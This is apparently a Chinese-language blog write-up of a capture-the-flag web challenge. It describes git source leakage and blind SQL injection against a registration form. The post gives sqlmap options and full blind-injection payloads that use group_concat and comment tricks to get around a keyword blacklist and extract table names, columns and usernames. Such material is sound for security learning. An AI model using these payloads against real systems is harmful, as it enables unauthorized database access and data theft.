[SniperOJ](web)图书管理系统 注入 源码泄露
0x00 题目概况
题目地址:http://www.sniperoj.cn:10000/
这是一道注入题,存在git源码泄露,使用githack(freebuf有工具介绍)把源码脱下来,进行审计,然后注入。
挺简单的一道题,我自己卡一个地方卡了好久就是。
拖下来源码放在我服务器上,懒得拖想看看可以下载:
120.27.32.227/sniper.rar
大概分析如下:
敏感词过滤
$blacklist = array(" select "," union ","limit", " from ", "and","sleep");
foreach ($_POST as $key => $value) {
for ($i= 0;$i< count($blacklist); $i++){
if(strpos(strtolower($value), $blacklist[$i]) != false){
die("Come on inject me, you stupid srcipt kid!");
}
在注册页面:
// 判断用户是否存在
$sql_check = "SELECT userID from users where username = '$username'";
$result = $conn->query($sql_check);
if ($result->num_rows > 0) {
die("{\"status\":\"0\",\"msg\":\"用户名已存在\"}");
}
很明显的盲注点,在登录界面也有一个盲注点。(没发现哪里可以明注,本人新手还望赐教)
0x01 自己解题历程
1. 那个黑名单,“select”"union“” 可以使用内联注释绕过,或者使用其他如 /**/ 代替空格即可,and 可以用 && 代替,limit 没有找到方法绕过
2. 注入点 ,username 可以为:
' or 1 #
在 1 处进行盲注。
为真的关键词是 “用户名已存在”。
一看这么简单,加上最近深入了解了一下slqmap,所以想下直接用sqlmap跑就行。
sqlmap参数: --string "用户名已存在" --suffix "#" --prefix " 'or " -v 3 --risk 3 --tamper space2comment.py
确实可以跑出来,但是,只能跑出数据库名,表名要靠碰撞,其他获取不到,很是困惑。
纠结了好一会,查看slqmap的payload才想起是 "limit" 在黑名单里面。
接下来就是怎么绕过limit限制的问题了。大体上思路有两种。
1. 不用limit ,寻找可以代替limit的关键字
2. 绕过限制,如编码绕过,内联注释绕过
找了挺久的资料,一无所获。没有找到mysql没有能代替limit的关键字,这里也绕过不了。
在网上看到一种这种绕过,在关键字中添加 注释 “/**/” ,如:sele/***/ct 。这是一种错误的方式,除非php会对 “/**/”进行过滤,否则,这种语句带入到数据库进行查询会报错的。
0x02 正确的思路:group_concat
大概自己思维还是太狭隘,一直在纠结怎么绕过limit ,想着盲注一定要有limit。
把源码挂在屏幕半天,偶然看自己的一下笔记才想起来使用 “group_concat”
个人对group_concat通俗理解:
进行查询,将多条查询结果以一行显示出来,即一条
如:select group_concat(username) from users
会将所有的username显示在一行
想到这,就没必要用limit 了。接下来就是写脚本的问题。
payload 如下:
获取表名:
' or ascii(substr(((select/**/group_concat(table_name)/**/from/**/information_schema.tables where table_schema=database()))from/**/1 for 1))=93 #
获取列名:
' or ascii(substr(((select/**/group_concat(column_name)/**/from/**/information_schema.columns where table_name=0x7573657273))from/**/2 for 1))=71 #
获取具体数据:
' or ascii(substr(((select/**/group_concat(username)/**/from/**/users))/**/from 2 for 1))=21 #
0x03 总结
git泄露
盲注不一定要使用 limit
记住 group_concat
使用sqlmap行不通时查看payload,别太依赖工具
题目挺简单的,自己太菜了,还要多学多看,这些远远不够
[SniperOJ](web)图书管理系统 注入 源码泄露的更多相关文章
- CTF中常见Web源码泄露总结
目录00x1 .ng源码泄露 00x2 git源码泄露 00x3 .DS_Store文件泄漏 00x4 网站备份压缩文件 00x5 SVN导致文件泄露 00x6 WEB-INF/web.xml泄露 ...
- Web源码泄露总结
Web源码泄露总结 背景 本文主要是记录一下常见的源码泄漏问题,这些经常在web渗透测试以及CTF中出现. 源码泄漏分类 .hg源码泄漏 漏洞成因: hg init的时候会生成.hg e.g.http ...
- ctf/web源码泄露及利用办法
和上一篇文章差不多,也算是对web源码泄露的一个总结,但是这篇文章更侧重于CTF 参考文章: https://blog.csdn.net/wy_97/article/details/78165051? ...
- 常见的Web源码泄露总结
常见的Web源码泄露总结 源码泄露方式分类 .hg源码泄露 漏洞成因: hg init 的时候会生成 .hg 漏洞利用: 工具: dvcs-ripper .git源码泄露 漏洞成因: 在运行git i ...
- [WEB安全]源码泄露总结
原文链接:https://blog.csdn.net/qq_36869808/article/details/88895109 源码泄露总结: svn源码泄露:https://blog.csdn.ne ...
- [web 安全] 源码泄露
web 源码泄露 1..hg 源码泄露 http://www.example.com/.hg/ 2..git 源码泄露 http://www.example.com/.git/config 3..ds ...
- ctf常见源码泄露
前言 在ctf中发现很多源码泄露的题,总结一下,对于网站的搭建要注意删除备份文件,和一些工具的使用如git,svn等等的规范使用,避免备份文件出现在公网 SVN源码泄露 原理 SVN(subversi ...
- XJar: Spring-Boot JAR 包加/解密工具,避免源码泄露以及反编译
XJar: Spring-Boot JAR 包加/解密工具,避免源码泄露以及反编译 <?xml version="1.0" encoding="UTF-8" ...
- 放出一批学生管理系统jsp源码,部分有框架
基于jsp+struts 2的学生管理系统eclipse - 源码码头 https://www.icodedock.com/article/25.html 基于jsp+mysql的JSP学生成绩管 ...
随机推荐
- SQL代码规范
1. 建表规约 1) 表中字段名称 a) 表达是否概念的字段,必须使用is_xxx的方式命名,数据类型是bit b) 小数类型为decimal,禁止使用float和double. 说 ...
- Solution -「Gym 102956B」Beautiful Sequence Unraveling
\(\mathcal{Description}\) Link. 求长度为 \(n\),值域为 \([1,m]\) 的整数序列 \(\lang a_n\rang\) 的个数,满足 \(\not\ ...
- Solution -「JOISC 2020」「UOJ #509」迷路的猫
\(\mathcal{Decription}\) Link. 这是一道通信题. 给定一个 \(n\) 个点 \(m\) 条边的连通无向图与两个限制 \(A,B\). 程序 Anthon ...
- 6.Flink实时项目之业务数据分流
在上一篇文章中,我们已经获取到了业务数据的输出流,分别是dim层维度数据的输出流,及dwd层事实数据的输出流,接下来我们要做的就是把这些输出流分别再流向对应的数据介质中,dim层流向hbase中,dw ...
- Spring Cloud Feign 如何使用对象参数
概述 Spring Cloud Feign 用于微服务的封装,通过接口代理的实现方式让微服务调用变得简单,让微服务的使用上如同本地服务.但是它在传参方面不是很完美.在使用 Feign 代理 GET 请 ...
- spring IOC的理解,原理与底层实现?
从总体到局部 总 控制反转:理论思想,原来的对象是由使用者来进行控制,有了spring之后,可以把整个对象交给spring来帮我们进行管理 DI(依赖注入):把对应的属性 ...
- scrapy爬取《坏蛋是怎样练成的4》
scrapy具体介绍就不用说了,自己百度一下.或者参考以下文档 https://blog.csdn.net/u011054333/article/details/70165401 直接在cmd里运行 ...
- [GAME] [Civilization] 文明6字体及字体大小修改
一.前言 文明作为一款文本信息量较大的游戏,提供的字体和UI界面设置还是偏少了一些,对干眼用户极不友好 二.用户界面整体缩放 首先是游戏自带的缩放选项:图象选项-图像-UI质量提升,设置为150%或更 ...
- Telnet拓展测试--在生产测试场景的应用
本文关键词:流量测试.Telnet拓展测试.TCP/IP.时延 一.Telnet简介 Telnet协议是TCP/IP协议族中的一员,是Internet远程登录服务的标准协议和主要方式.它为用户提供了在 ...
- 关于C#理解装箱与拆箱
目录 1.理解装箱 2.理解拆箱 3.生成的 IL 代码 4.实际应用 5.小结 1.理解装箱 简单地说,装箱就是将一个值类型的数据存储在一个引用类型的变量中. 假设你一个方法中创建了一个 int 类 ...